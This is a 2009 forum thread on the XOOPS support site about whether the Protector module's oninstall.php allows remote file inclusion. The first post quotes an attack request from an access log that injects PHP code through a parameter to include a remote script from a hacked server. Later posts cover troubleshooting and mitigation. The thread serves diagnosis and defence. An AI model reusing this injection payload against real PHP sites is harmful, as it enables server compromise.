Is protector vulnerable to rfi attacks? [2.3.x Support]

Is protector vulnerable to rfi attacks?

2009/10/4 21:39
kerkyra
Just can't stay away
Posts: 553
Since: 2005/2/14

hi i recently received an abuse complaint about my server. I found out that there was an RFI (Remote File Inclusion) attack in one of my domains. The xoops_lib and xoops_data folders where outside document root (httpdocs) and from the log i see that the oninstall.php file of protector is running a txt file!

Quote:

"GET
/logs/access.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://some_hacked_server.org/tools/idxx.txt??

any ideas or suggestions? Is this indeed a vulerability? Is there something i'm missing perhaps? Please advise on this. Thanks

Edit by Ghia: changed hostname: no links to crack tools on XOOPS.org please!

Re: Is protector vulnerable to rfi attacks?

2009/10/5 15:56
ghia
Community Support Member
Posts: 4953
Since: 2008/7/3 1

If your xoops_lib is outside the root then this URL will have given a 404 not found error and the number of bytes returned will be 0.
It is indeed an attempt to try to get information of your server, but has not succeeded.

What do you mean by abuse complaint? Nothing happened or did it?

Re: Is protector vulnerable to rfi attacks?

2009/10/5 19:11
kerkyra
Just can't stay away
Posts: 553
Since: 2005/2/14

actually something did happen. They start attacking other sites from my server (using a perl script). Not sure where they got access though!and not sure where to look either. It turned out that allow_url_fopen was on. I turned it off and now it seems to be ok! Again not sure about it! i will have to monitor the server and see.

Re: Is protector vulnerable to rfi attacks?

2009/10/5 21:47
ghia
Community Support Member
Posts: 4953
Since: 2008/7/3 1

You need to review the Apache log files.

Stats
Goal:	$100.00
Due Date:	Nov 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Is protector vulnerable to rfi attacks?

Re: Is protector vulnerable to rfi attacks?

Re: Is protector vulnerable to rfi attacks?

Re: Is protector vulnerable to rfi attacks?

Login

Search

Recent Posts

XOOPS MyMenus 1.54.0 Beta 10

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Re: XOOPS MyMenus 1.54.0 Beta 7

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}